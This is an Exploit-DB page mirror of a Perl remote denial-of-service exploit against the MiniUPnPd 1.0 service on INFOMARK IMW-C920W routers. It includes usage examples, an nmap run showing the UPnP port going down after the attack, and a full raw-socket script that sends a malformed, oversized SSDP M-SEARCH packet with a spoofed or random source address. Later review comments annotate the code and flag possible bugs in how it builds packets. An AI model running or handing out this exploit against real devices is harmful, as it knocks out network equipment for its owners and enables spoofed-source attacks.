INFOMARK IMW-C920W MiniUPnPd 1.0 – Denial of Service

  • 作者: Todor Donev
    日期: 2015-07-07
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/37517/
  • #!/usr/bin/perl
    #
    #miniupnpd/1.0 remote denial of service exploit
    #
    #Copyright 2015 (c) Todor Donev 
    #todor.donev@gmail.com
    #http://www.ethical-hacker.org/
    #https://www.facebook.com/ethicalhackerorg
    #
    #The SSDP protocol discovers Plug & Play devices
    #in UPnP (Universal Plug and Play). SSDP is an HTTP-
    #like protocol and works with the NOTIFY and M-SEARCH
    #methods.
    #
    #See also: 
    #CVE-2013-0229 
    #http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0229
    #CVE-2013-0230
    #http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0230
    #
    #Tested on
    #Device Name :IMW-C920W
    #Device Manufacturer :INFOMARK (http://infomark.co.kr)
    #
    #These devices are commonly used by Max Telecom, Bulgaria
    #
    #Disclaimer:
    #This or previous program is for Educational
    #purpose ONLY. Do not use it without permission.
    #The usual disclaimer applies, especially the
    #fact that Todor Donev is not liable for any
    #damages caused by direct or indirect use of the
    #information or functionality provided by these
    #programs. The author or any Internet provider
    #bears NO responsibility for content or misuse
    #of these programs or any derivatives thereof.
    #By using these programs you accept the fact
    #that any damage (dataloss, system crash,
    #system compromise, etc.) caused by the use
    #of these programs is not Todor Donev's
    #responsibility.
    # 
    #Use at your own risk!
    #
    #See also:
    #SSDP Reflection DDoS Attacks 
    #http://tinyurl.com/mqwj6xt
    #
    #######################################
    #
    # # perl miniupnpd.pl
    # 
    # [miniupnpd/1.0 remote denial of service exploit ]
    # [ =============================================== ]
    # [Usage:					
    # [ ./miniupnpd.pl <victim address> <spoofed address>
    # [Example:
    # [ perl miniupnpd.pl 192.168.1.1 133.73.13.37
    # [Example:
    # [ perl miniupnpd.pl 192.168.1.1
    # [ =============================================== ]
    # [ 2015<todor.donev@gmail.com> Todor Donev2015 ]
    #
    # # nmap -sU 192.168.1.1 -p1900 --script=upnp-info
    #
    # Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST
    # Nmap scan report for 192.168.1.1
    # Host is up (0.00078s latency).
    # PORT STATE SERVICE
    # 1900/udp open  upnp
    # | upnp-info:
    # | 192.168.1.1
    # | Server: 1.0 UPnP/1.0 miniupnpd/1.0
    # | Location: http://192.168.1.1:5000/rootDesc.xml
    # | Webserver: 1.0 UPnP/1.0 miniupnpd/1.0
    # | Name: INFOMARK Router
    # | Manufacturer: INFOMARK
    # | Model Descr: INFOMARK Router
    # | Model Name: INFOMARK Router
    # | Model Version: 1
    # | Name: WANDevice
    # | Manufacturer: MiniUPnP
    # | Model Descr: WAN Device
    # | Model Name: WAN Device
    # | Model Version: 20070228
    # | Name: WANConnectionDevice
    # | Manufacturer: MiniUPnP
    # | Model Descr: MiniUPnP daemon
    # | Model Name: MiniUPnPd
    # |_Model Version: 20070228
    # MAC Address: 00:00:00:00:00:00 (Infomark Co.) // CENSORED
    #
    # Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
    #
    # # perl miniupnpd.pl 192.168.1.1
    #
    # [miniupnpd/1.0 remote denial of service exploit ]
    # [ =============================================== ]
    # [ Target: 192.168.1.1
    # [ Send malformed SSDP packet..
    #
    # # nmap -sU 192.168.1.1 -p1900
    #
    # Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST
    # Nmap scan report for 192.168.1.1
    # Host is up (0.00085s latency).
    # PORT     STATE  SERVICE
    # 1900/udp closed upnp    // GOOD NIGHT, SWEET PRINCE.... :D
    # MAC Address: 00:00:00:00:00:00 (Infomark Co.) // CENSORED
    #
    # Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds
    #
    #
    # Special thanks to HD Moore ..
    #
    
    use Socket;
    
    # NOTE(review): the script never enables `use strict; use warnings;`, so the
    # precedence slips and unused variables noted in the subs below are not
    # reported at runtime.
    #
    # Refuse to run unless the real UID ($<) is 0: the SOCK_RAW socket opened
    # below needs raw-socket privilege.
    if ( $< != 0 ) {
     print "Sorry, must be run as root!\n";
     print "This script use RAW Socket.\n"; 
     exit;
    }
    
    # File-scope lexicals read by iphdr() and send_packet() below.
    # gethostbyname() in list context returns (name, aliases, addrtype, length,
    # @addrs); element [4] is the first address as a packed 4-byte string, so a
    # hostname or a dotted quad is accepted. $ARGV[1] (the spoofed source) is
    # optional: when it is absent $ip_src is undef and iphdr() picks a random
    # address instead.
    my $ip_src = (gethostbyname($ARGV[1]))[4];
    my $ip_dst = (gethostbyname($ARGV[0]))[4];
    
    print "\n[miniupnpd/1.0 remote denial of service exploit ]\n";
    print "[ =============================================== ]\n";
    select(undef, undef, undef, 0.40);   # four-arg select used as a 0.40 s sleep
    
    # No resolvable target in $ARGV[0]: print usage and stop.
    if (!defined $ip_dst) {
    print "[Usage:\n[ ./$0 <victim address> <spoofed address>\n";
    select(undef, undef, undef, 0.55);
    print "[Example:\n[ perl $0 192.168.1.1 133.73.13.37\n";
    print "[Example:\n[ perl $0 192.168.1.1\n";
    print "[ =============================================== ]\n";
    print "[ 2015<todor.donev\@gmail.com> Todor Donev2015 ]\n\n";
    exit;
    }
    # Bareword filehandle RAW: an IPv4 raw socket with protocol number 255
    # (IPPROTO_RAW), over which the hand-built IP header is sent as-is.
    # NOTE(review): setsockopt() is called with bare numbers (level 0, option 1,
    # value 1) rather than the named constants Socket exports, so the intended
    # option cannot be confirmed from this line -- presumably header-included
    # mode; verify the constant value against the target platform.
    socket(RAW, PF_INET, SOCK_RAW, 255) or die $!;
    setsockopt(RAW, 0, 1, 1) or die $!;
    main();
    
    # Main program: assemble the datagram in wire order -- IP header, UDP
    # header, SSDP payload -- and hand the finished bytes to send_packet().
    sub main {
        my $datagram = join '', iphdr(), udphdr(), payload();
        # b000000m...
        send_packet($datagram);
    }
    
    # IP header (Layer 3): the 20-byte IPv4 header that the raw socket sends
    # verbatim ahead of the UDP header and payload. Reads the file-scope
    # $ip_src / $ip_dst resolved from @ARGV at startup.
    sub iphdr {
    my $ip_ver 	= 4; 			# IP version (4 bits); concatenated with $iphdr_len into the "45" hex byte below
    my $iphdr_len	= 5;		# header length in 32-bit words (4 bits)
    my $ip_tos 	= 0;		# TOS / DS byte (8 bits)
    # NOTE(review): this evaluates to 25 (5 + 20), which is not the length of
    # the datagram assembled in main(); whether the value as written reaches
    # the wire depends on how the platform treats this field on a raw socket.
    my $ip_total_len 	= $iphdr_len + 20;		# total length (16 bits)
    my $ip_frag_id 	= 0;		# identification (16 bits)
    my $ip_frag_flag 	= 000;			# flags R/DF/MF (3 bits); 000 is an octal literal, i.e. the number 0
    my $ip_frag_offset 	= 0000000000000;			# fragment offset (13 bits); likewise an octal literal for 0
    # NOTE(review): packed with 'h2' below, which takes the first two characters
    # of "255" as hex digits low-nybble-first ("25" -> 0x52), so the TTL byte
    # emitted is presumably 82 rather than 255 -- TODO confirm.
    my $ip_ttl 	= 255;		# TTL (8 bits)
    my $ip_proto 	= 17; 		# protocol 17 = UDP (8 bits)
    my $ip_checksum	= 0;		# header checksum (16 bits), left as 0; not computed here
    # Source address (32 bits): random when no spoofed address was supplied.
    # NOTE(review): `my ... if COND` is undefined behaviour per perlsyn, and the
    # new lexical shadows the file-scope $ip_src for the pack() below, so the
    # caller-supplied spoofed address is not guaranteed to be the one packed
    # -- TODO confirm. `&randip` also bypasses randip's () prototype.
    my $ip_src=gethostbyname(&randip) if !$ip_src; 		# scalar-context gethostbyname returns the packed address
    # IP Packet construction. Template: H2 (hex, high nybble first) ver/hlen,
    # H2 tos, n total length, n id, B16 flags+offset as a bit string ("00"
    # zero-padded to 16 bits), h2 ttl, c protocol, n checksum, a4 src, a4 dst.
    	my $iphdr	= pack(
    				'H2 H2 n n B16 h2 c n a4 a4',
    				$ip_ver . $iphdr_len, $ip_tos, $ip_total_len,
    				$ip_frag_id, $ip_frag_flag . $ip_frag_offset,
    				$ip_ttl, $ip_proto, $ip_checksum,
    				$ip_src, $ip_dst
    			);
    
    return $iphdr;
    }
    
    # UDP header (Layer 4): 8 bytes, four big-endian 16-bit fields.
    sub udphdr {
        # Source port 31337, destination 1900 (SSDP); the length field covers
        # the 8-byte header plus the SSDP payload; a checksum of 0 means
        # "no checksum" for UDP over IPv4. payload() is called here only to
        # size it -- the bytes actually sent come from a separate call in main().
        my @fields = (31337, 1900, 8 + length(payload()), 0);
        return pack('n4', @fields);
    }
    
    # Create SSDP Bomb: an M-SEARCH start line followed by 1261 random letters.
    # Note the double-quoted "\\r\\n": the line ends in the four characters
    # backslash, r, backslash, n, not a real CRLF, so the request is malformed
    # as seen by an SSDP parser.
    sub payload {
        my $data = "M-SEARCH * HTTP\/1.1\\r\\n";
        # 1261 characters with codes int(rand(25) + 65), i.e. 65..89 ('A'..'Y').
        $data .= chr(int(rand(25) + 65)) for 0 .. 1260;
        # pack 'a<len>' with the exact length is a plain copy of $data.
        return pack('a' . length($data), $data);
    }
    
    # Generate random source ip address: returns a dotted-quad string whose four
    # octets are each int(rand(255)), i.e. 0..254. The () prototype declares it
    # argument-free, but iphdr() calls it as &randip, which bypasses prototypes.
    sub randip () {
    # Reseeds the RNG from time and pid on every call; the rand() calls in
    # payload() that run afterwards draw from this seed too.
    srand(time() ^ ($$ + ($$ << 15)));
     my $ipdata;
    # Assignment binds tighter than the comma, so this is ($ipdata = join(...)),
    # "\n": the "\n" is evaluated and discarded and $ipdata carries no newline.
    $ipdata 	= join ('.', (int(rand(255)), int(rand(255)), int(rand(255)), int(rand(255)))), "\n";
    # NOTE(review): $ipsrc is never used; rand($ipdata) numifies the dotted
    # quad, so this line has no effect on the result.
     my $ipsrc 		= pack('A' . length($ipdata), rand($ipdata));
    return $ipdata;
    }
    
    # Send the malformed packet: one raw datagram (IP header included) to the
    # file-scope $ip_dst through the RAW handle opened at startup. Dies on a
    # failed send().
    sub send_packet {
        my ($datagram) = @_;
        print "[ Target: $ARGV[0]\n";
        select(undef, undef, undef, 0.30);   # 0.30 s pause before sending
        print "[ Send malformed SSDP packet..\n\n";
        # Hand-built sockaddr_in: native u16 family, big-endian port 60, 4-byte
        # address, 8 zero bytes of padding. Presumably only the address matters
        # to a raw socket -- TODO confirm how the platform treats the port.
        my $sockaddr = pack('Sna4x8', PF_INET, 60, $ip_dst);
        send(RAW, $datagram, 0, $sockaddr) or die $!;
    }